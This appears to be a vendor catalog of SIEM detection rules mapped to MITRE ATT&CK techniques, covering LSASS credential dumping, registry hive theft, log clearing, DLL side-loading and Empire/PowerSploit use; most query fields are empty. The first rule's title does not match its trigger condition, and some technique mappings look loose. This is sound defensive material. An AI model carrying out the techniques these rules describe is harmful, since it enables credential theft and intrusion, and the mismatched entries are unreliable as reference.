MITRE ATT&CK Analytics
LP_Successful Microsoft 365 Login with Reconnaissance User Agents
Trigger Condition: Usage of the CreateRemoteThread API and LoadLibrary functions to inject a DLL into a process.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Dynamic-link Library Injection
ATT&CK ID: T1055.001
Minimum Log Source Requirement: Windows Sysmon
Query:
norm_id=WindowsSysmon event_id=8 start_module="*\kernel32.dll" start_function="LoadLibraryA" -user IN EXCLUDED_USERS
LP_Command Obfuscation via Character Insertion
Trigger Condition: Command obfuscation of command prompt by character insertion is detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Windows Command Shell
ATT&CK ID: T1059, T1059.003
Minimum Log Source Requirement: Windows Sysmon
Query:
label="Process" label=Create parent_process='*\cmd.exe' parent_command="cmd*/c*"
| norm on parent_command <command_match:'[^\w](s\^+e\^*t|s\^*e\^+t)[^\w]'>
| filter command_match=*
LP_Credential Access via Input Prompt Detected
Trigger Condition: A command executed to capture user input to obtain the credentials is detected.
ATT&CK Category: Credential Access, Collection
ATT&CK Tag: Input Capture, GUI Input Capture
ATT&CK ID: T1056, T1056.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Credential Dump Tools Dropped Files Detected
Trigger Condition: Creation of files with well-known filenames that are part of credential dumping software, or that are produced by it, is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
ATT&CK ID: T1003.001, T1003.002, T1003.003, T1003.004, T1003.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dumping with ImageLoad Detected
Trigger Condition: This alert is triggered whenever attempts by adversaries to dump credentials using DLL images are detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Registry Enumeration for credentials Detected
Trigger Condition: This alert is triggered whenever adversaries search the registry of compromised systems to find and obtain insecurely stored credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: Unsecured Credentials, Credentials in Registry
ATT&CK ID: T1552, T1552.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Account privilege elevation followed by restoration of the previous account state
Trigger Condition: A user is added to a group or assigned a privilege, followed by removal of those rights, restoring the previous account state.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Account Manipulation, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1068
Minimum Log Source Requirement: Windows
Query:
LP_Default Blocked Inbound Traffic followed by Allowed Event
Trigger Condition: Blocked inbound traffic followed by allowed traffic is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Brute Force Attack Successful
Trigger Condition: Five failed login attempts by a user followed by a successful login from the same user within five minutes are detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Windows, AWS, Firewall, WAF, Unix
Query:
LP_Default CPU Usage Status
Trigger Condition: The use of CPU exceeds 90%.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Logpoint
Query:
LP_Default Device Stopped Sending Logs for Half an Hour
Trigger Condition: A device that has not sent logs for half an hour or more is detected.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Firewall, IDS, IPS, Proxy Server, Windows, Unix
Query:
LP_Default DNS Tunneling Detection - Query Size
Trigger Condition: DNS traffic with a query of more than 64 characters is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Application Layer Protocol, DNS, Dynamic Resolution, Domain Generation Algorithms
ATT&CK ID: T1071, T1071.004, T1568, T1568.002
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server, DNS Server
Query:
LP_Default Excessive Blocked Connections
Trigger Condition: 50 blocked or denied connections are observed from the same source within a minute.
ATT&CK Category: Impact, Command and Control
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service, Proxy
ATT&CK ID: T1498, T1499, T1090
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Default File Association Changed
Trigger Condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by a file type association.
ATT&CK Category: Persistence
ATT&CK Tag: Event Triggered Execution, Change Default File Association
ATT&CK ID: T1546, T1546.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Default Guest Account Added to Administrative Group
Trigger Condition: A guest account is added to a security group, as logged under Security Group Management.
ATT&CK Category: Credential Access, Persistence, Privilege Escalation, Defense Evasion, Initial Access
ATT&CK Tag: Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Access Control, Valid Accounts
ATT&CK ID: T1098, T1548, T1548.002, T1078
Minimum Log Source Requirement: Windows
Query:
LP_Default IRC connection
Trigger Condition: An IRC connection is detected. For this alert to work, you must update the ALERT_IRC_PORT list with possible IRC ports.
ATT&CK Category: Command and Control, Discovery
ATT&CK Tag: Proxy, Network Service Scanning
ATT&CK ID: T1090, T1046
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Malware Detected
Trigger Condition: Malware or a virus is detected on the system.
ATT&CK Category: Resource Development
ATT&CK Tag: Develop Capabilities, Malware
ATT&CK ID: T1587, T1587.001
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Malware not Cleaned
Trigger Condition: A malware clean event (deletion, removal, or quarantine) is followed by detection of the same malware on the same host.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion, Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1211, T1518, T1518.001
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Malware Removed
Trigger Condition: Removal of malware or a virus from the system is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Removal on Host, Obfuscated Files or Information, Indicator Removal from Tools
ATT&CK ID: T1070, T1027, T1027.005
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Memory Usage Status
Trigger Condition: Physical memory usage exceeding 90% of the total available memory is detected.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Logpoint
Query:
LP_Default Network Configuration Change on Network Device
Trigger Condition: A change in the core network event source, such as a router or switch, is detected.
ATT&CK Category: Persistence, Credential Access, Defense Evasion, Privilege Escalation
ATT&CK Tag: Modify Existing Service, Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Access Control, Impair Defenses, Indicator Blocking, Modify Registry, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1548, T1562, T1562.006, T1112, T1068
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Port Scan Detected
Trigger Condition: Connection from multiple ports of a public IP address to a destination address is detected.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Firewall, IDS, IPS, Webserver
Query:
LP_Default Possible Cross Site Scripting Attack Detected
Trigger Condition: A script tag indicating an XSS attack is detected in the URL.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploiting Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Possible Non-PCI Compliant Inbound Network Traffic Detected
Trigger Condition: An inbound connection to security devices over ports that PCI compliance practices classify as non-compliant is detected. For this alert to work, you must update the NON_PCI_COMPLIANT_PORT list.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Default Possible SQL Injection Attack
Trigger Condition: SQL character injection in the input field of a web application is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Possible System Instability State Detected
Trigger Condition: Instability of a system is detected, for example when a system shuts down or restarts more than five times within ten minutes. A correlation rule is designed to detect whether a system has become unstable.
ATT&CK Category: Impact
ATT&CK Tag: System Shutdown/Reboot
ATT&CK ID: T1529
Minimum Log Source Requirement: OS
Query:
LP_Default PowerSploit and Empire Schtasks Persistence
Trigger Condition: Creation of a scheduled task (schtasks) using the PowerSploit or Empire default configuration is detected.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Scheduled Task, PowerShell
ATT&CK ID: T1053.005, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Successful Login outside Normal Hour
Trigger Condition: A successful user login outside regular office hours is detected. You can adjust the regular work hours according to your company.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Default Successful Login Using a Default Account
Trigger Condition: Successful login attempts using a vendor default account are detected. This alert is essential for organizations subject to Payment Card Industry (PCI) compliance.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Default Accounts
ATT&CK ID: T1078, T1078.001
Minimum Log Source Requirement: Windows
Query:
LP_Default System Time Change
Trigger Condition: The system time is changed, or the Logpoint command /opt/immune/installed/system/root_actions/*_ntp.sh is executed.
ATT&CK Category: Persistence, Impact
ATT&CK Tag: Modify Existing Service, Data Destruction
ATT&CK ID: T1485
Minimum Log Source Requirement: Windows
Query:
LP_Default TCP Probable SynFlood Attack
Trigger Condition: Security devices detect ten TCP Syn flood events within a minute.
ATT&CK Category: Impact
ATT&CK Tag: Endpoint Denial of Service
ATT&CK ID: T1499
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Unusual Number of Failed Vendor User Login
Trigger Condition: More than 10 failed user logins using default credentials are detected. For this alert to work, you must update the DEFAULT_USERS list with default vendor user names.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Default Accounts
ATT&CK ID: T1078, T1078.001
Minimum Log Source Requirement: Windows
Query:
LP_HandleKatz Duplicating LSASS Handle
Trigger Condition: The HandleKatz tool directly opening the LSASS process to duplicate its handle is detected.
ATT&CK Category: Execution, Credential Access
ATT&CK Tag: LSASS Memory, Native API
ATT&CK ID: T1003.001, T1106
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Execution Policy Modification Detected
Trigger Condition: Registry value for the PowerShell execution policy is changed.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Modify Registry
ATT&CK ID: T1059.001, T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Devtoolslauncher Executes Specified Binary
Trigger Condition: Usage of devtoolslauncher to execute other binaries. Adversaries attempt to bypass process or signature-based defences by proxying the execution of malicious content with signed binaries using devtoolslauncher and LaunchForDeploy commands.
ATT&CK Category: Defense Evasion
ATT&CK Tag: System Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_DHCP Callout DLL Installation Detected
Trigger Condition: Installation of a Callout DLL via the CalloutDlls and CalloutEnabled registry parameters, which can be used to execute code in the context of the DHCP server, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading, Modify Registry
ATT&CK ID: T1574, T1574.002, T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DHCP Server Error Failed Loading the CallOut DLL
Trigger Condition: DHCP server error in which a specified Callout DLL in registry cannot be loaded.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DHCP Server Loaded the CallOut DLL
Trigger Condition: Specified Callout DLL in the registry loaded by the DHCP server. Adversaries attempt to run their specified DLL through the DHCP server to achieve their objectives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows
Query:
LP_Disable of ETW Trace
Trigger Condition: Usage of a command that clears or disables any Event Tracing for Windows (ETW) trace log. Adversaries can temporarily or permanently cease logging flow without generating any additional event-clear log entries from this tactic.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Blocking, Indicator Removal
ATT&CK ID: T1562.006, T1070
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Execution of Base64 Encoded Command Using IEX
Trigger Condition: This alert detects the usage of the “IEX” (Invoke-Expression) cmdlet to execute encoded PowerShell commands.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Discovery via PowerSploit Recon Module
Trigger Condition: This alert is triggered whenever execution of the PowerSploit reconnaissance module is detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_DLL Load via LSASS Detected
Trigger Condition: A DLL loaded by the LSASS process through an undocumented registry key is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, LSASS Driver
ATT&CK ID: T1547, T1547.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DNS Server Error Failed Loading the ServerLevelPluginDLL
Trigger Condition: A DNS server error in which a plugin DLL specified in the registry cannot be loaded is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: DNS Server
Query:
LP_DNS ServerLevelPluginDll Install
Trigger Condition: This alert is triggered whenever installation of a plugin DLL via the ServerLevelPluginDll registry parameter, which can be used to execute code in the context of the DNS server, is detected. A restart is required for the change to take effect.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry, DLL Side-Loading
ATT&CK ID: T1112, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Domain Trust Discovery Detected
Trigger Condition: An adversary's attempt to gather information on domain trust relationships is detected. A domain trust is a relationship between two domains that allows users in one domain to be authenticated in the other.
ATT&CK Category: Discovery
ATT&CK Tag: Domain Trust Discovery
ATT&CK ID: T1482
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_dotNET DLL Loaded Via Office Applications
Trigger Condition: A .NET assembly DLL loaded by an Office product is detected.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DPAPI Domain Backup Key Extraction Detected
Trigger Condition: Tools extracting the LSA secret DPAPI domain backup key from domain controllers.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_DPAPI Domain Master Key Backup Attempt
Trigger Condition: An attempt to backup Data Protection API (DPAPI) master key is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_Dridex Process Pattern Detected
Trigger Condition: Typical Dridex process patterns are detected.
ATT&CK Category: Defense Evasion, Privilege Escalation, Discovery
ATT&CK Tag: Process Injection, System Owner/User Discovery, Network Share Discovery
ATT&CK ID: T1055, T1033, T1135
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Droppers Exploiting CVE-2017-11882 Detected
Trigger Condition: Exploitation of CVE-2017-11882 to start EQNEDT32.EXE and other sub-processes such as mshta.exe is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Exploitation for Defense Evasion
ATT&CK ID: T1211
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Drupal Arbitrary Code Execution Detected
Trigger Condition: This alert is triggered whenever exploitation of the arbitrary code execution vulnerability (CVE-2018-7600) in Drupal is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Elevated Command Prompt Activity by Non-Admin User Detected
Trigger Condition: Execution of an elevated command prompt by a non-admin user. Adversaries use this technique to execute commands or scripts that require a higher privilege than the regular users.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows
Query:
LP_EMC Possible Ransomware Detection
Trigger Condition: Suspicious data activity affecting more than 200 files (or an in-house baseline) is detected.
ATT&CK Category: Impact
ATT&CK Tag: Data Encrypted for Impact, Data Destruction, Proxy
ATT&CK ID: T1486, T1485, T1090
Minimum Log Source Requirement: EMC
Query:
LP_Empire PowerShell Launch Parameters
Trigger Condition: Suspicious PowerShell command line parameters used in Empire are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Enabled User Right in AD to Control User Objects
Trigger Condition: A user is assigned the SeEnableDelegationPrivilege right in Active Directory, which allows them to control other Active Directory users' objects.
ATT&CK Category: Privilege Escalation, Initial Access, Persistence, Defense Evasion
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Encoded PowerShell Command Detected
Trigger Condition: Execution of encoded PowerShell commands is detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Eventlog Cleared Detected
Trigger Condition: Clearing of one of the Windows event logs is detected. Adversaries use this technique to remove traces of an intrusion.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs
ATT&CK ID: T1070.001
Minimum Log Source Requirement: Windows
Query:
LP_Executables Stored in OneDrive
Trigger Condition: A user stores files that are executable in OneDrive.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Office365
Query:
LP_Execution in Non-Executable Folder Detected
Trigger Condition: Process creation from an uncommon directory.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution in Webserver Root Folder Detected
Trigger Condition: Execution of a suspicious program in a web service root folder (filter out false positives).
ATT&CK Category: Persistence
ATT&CK Tag: Server Software Component, Web Shell
ATT&CK ID: T1505, T1505.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Renamed PaExec Detected
Trigger Condition: Execution of a renamed PAExec binary, identified via its imphash and executable product string, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Execution via Control Panel Items
Trigger Condition: Execution of a binary via Control Panel items (signed binary proxy execution) is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Control Panel
ATT&CK ID: T1218.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution via HTA using IE JavaScript Engine Detected
Trigger Condition: Execution of an HTA (HTML Application) file using the Internet Explorer JavaScript engine.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Mshta
ATT&CK ID: T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Fsutil Invocation
Trigger Condition: Execution of Fsutil with Createjournal, Deletejournal or setZeroData command-line argument.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal, Data Destruction
ATT&CK ID: T1070, T1485
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Number of Process Termination
Trigger Condition: More than ten processes are terminated. In Microsoft Windows, processes can be terminated using taskkill, service stop, and service delete. Adversaries use this technique to kill, stop, or delete services or processes that could prevent payload execution.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution via Windows Scripting Host Component Detected
Trigger Condition: Execution of a script using a system’s Windows Scripting Host (WSH) component. WSH is a Microsoft technology that allows users to run scripts and automate tasks on Windows systems.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Exim MTA Remote Code Execution Vulnerability Detected
Trigger Condition: Remote code execution vulnerability in Exim MTA is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Exim Remote Command Execution Detected
Trigger Condition: Remote command execution in Exim (CVE-2019-10149) is detected.
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Mail Server
Query:
LP_Existing Service Modification Detected
Trigger Condition: A modification of an existing service via the sc.exe system utility is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Create or Modify System Process, Windows Service
ATT&CK ID: T1543, T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Fail2ban IP Banned
Trigger Condition: A client’s IP address is banned after exceeding the limit for failed authentications.
ATT&CK Category: Credential Access, Persistence
ATT&CK Tag: Brute Force, Valid Accounts, Account Manipulation
ATT&CK ID: T1110, T1078, T1098
Minimum Log Source Requirement: Fail2ban
Query:
LP_File Creation by PowerShell Detected
Trigger Condition: Creation of a new file using PowerShell on a system. Adversaries may use PowerShell to create new files, as a way to drop and execute malicious payloads, or to store data for later retrieval.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Deletion Detected
Trigger Condition: File deletion, which adversaries use to erase traces of an intrusion, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Removal on Host, File Deletion
ATT&CK ID: T1070, T1070.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File or Folder Permissions Modifications
Trigger Condition: Modifications to file or folder permissions are detected. Permissions control access to files and directories and determine which users and processes can read, write, or execute them.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Windows File and Directory Permissions Modification
ATT&CK ID: T1222.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File System Permissions Weakness
Trigger Condition: A weakness in the file system permissions on a system is detected.
ATT&CK Category: Persistence, Privilege Escalation, Defense Evasion
ATT&CK Tag: Hijack Execution Flow, Services File Permissions Weakness
ATT&CK ID: T1574, T1574.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Firewall Disabled via Netsh Detected
Trigger Condition: netsh commands that turn off the Windows firewall are detected. Adversaries disable the firewall through netsh to bypass restrictions allowing connections with C&C servers.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify System Firewall
ATT&CK ID: T1562.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_First Time Seen Remote Named Pipe
Trigger Condition: The rule excludes known named pipes that are accessible remotely and alerts on newly seen ones.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows
Query:
LP_FirstClass Failed Login Attempt
Trigger Condition: A user or a gateway attempts to log in with an incorrect password.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Exploitation for Credential Access, Exploitation for Privilege Escalation, Brute Force
ATT&CK ID: T1212, T1068, T1110
Minimum Log Source Requirement: Firstclass
Query:
LP_FirstClass Failed Password Change Attempt
Trigger Condition: A user fails to change their password.
ATT&CK Category: Credential Access, Persistence
ATT&CK Tag: Account Manipulation, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1212, T1068
Minimum Log Source Requirement: Firstclass
Query:
LP_Formbook Process Creation Detected
Trigger Condition: This alert is triggered whenever Formbook-like process executions are detected: code is injected into a set of binaries in the System32 folder, which then execute a special command line to delete the dropper from the AppData Temp folder.
ATT&CK Category: Resource Development
ATT&CK Tag: Malware
ATT&CK ID: T1587.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_FortiGate Admin Login Disable
Trigger Condition: The administrator login is disabled in the system.
ATT&CK Category: Impact, Credential Access, Persistence
ATT&CK Tag: Account Access Removal, Account Manipulation
ATT&CK ID: T1531, T1098
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Anomaly
Trigger Condition: An anomaly in the system is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Antivirus Botnet Warning
Trigger Condition: A botnet warning from antivirus is detected.
ATT&CK Category: Command and Control, Impact
ATT&CK Tag: Proxy, Network Denial of Service
ATT&CK ID: T1090, T1498
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Antivirus Scan Engine Load Failed
Trigger Condition: An antivirus scan engine load failure is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Attack
Trigger Condition: An attack in the system is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service
ATT&CK ID: T1498
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Critical Events
Trigger Condition: Critical events in the system are detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Data Leak Protection
Trigger Condition: An attempted data leak is detected.
ATT&CK Category: Exfiltration
ATT&CK Tag: Automated Exfiltration
ATT&CK ID: T1020
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate IPS Events
Trigger Condition: An intrusion attempt is detected in the system.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Malicious URL Attack
Trigger Condition: A malicious URL attack on a system is detected. This alert rule is valid only for FortiOS V6.0.4.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Link
ATT&CK ID: T1566, T1566.002
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Virus
Trigger Condition: A virus attack is detected.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate VPN SSL User Login Failed
Trigger Condition: A VPN SSL login failure is detected.
ATT&CK Category: Initial Access, Credential Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: Fortigate
Query:
LP_FSecure File Infection
Trigger Condition: An infected file is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, File and Directory Discovery
ATT&CK ID: T1046, T1083
Minimum Log Source Requirement: Fsecure Gatekeeper
Query:
LP_FSecure Virus Detection
Trigger Condition: Virus alert is detected while scanning.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fsecure
Query:
LP_GAC DLL Loaded Via Office Applications Detected
Trigger Condition: GAC DLL loaded by an Office Product is detected.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Generic Password Dumper Activity on LSASS Detected
Trigger Condition: Process handle on LSASS process with access mask is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Grabbing Sensitive Hives via Reg Utility
Trigger Condition: This alert is triggered whenever sensitive Windows hives (SYSTEM, SAM, SECURITY) are accessed via the Reg utility.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets, Cached Domain Credentials, Credentials in Registry
ATT&CK ID: T1003.004, T1003.005, T1552.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hacktool Ruler Detected
Trigger Condition: Use of the SensePost hacktool Ruler is detected.
ATT&CK Category: Discovery, Execution
ATT&CK Tag: Account Discovery, Use Alternate Authentication Material, Pass the Hash, Email Collection, Command-Line Interface
ATT&CK ID: T1087, T1550, T1550.002, T1114, T1059
Minimum Log Source Requirement: Windows
Query:
LP_HH Execution Detected
Trigger Condition: Use of hh.exe to execute local Compiled HTML Help (CHM) or remote CHM files.
ATT&CK Category: Defense Evasion, Initial Access
ATT&CK Tag: Compiled HTML File, Spearphishing Attachment
ATT&CK ID: T1218.001, T1566.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hiding Files with Attrib Detected
Trigger Condition: Use of attrib.exe to hide files from users.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hide Artifacts, Hidden Files and Directories
ATT&CK ID: T1564, T1564.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_In-memory PowerShell Detected
Trigger Condition: Loading of System.Management.Automation.dll by a process other than PowerShell is detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Indicator Blocking - Driver Unloaded
Trigger Condition: A driver unload that blocks indicators or events captured by a sensor from being gathered and analyzed is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Indicator Blocking - Sysmon Registry Edited
Trigger Condition: An indicator blocking via registry editing is detected.
ATT&CK Category: Defense Evasion
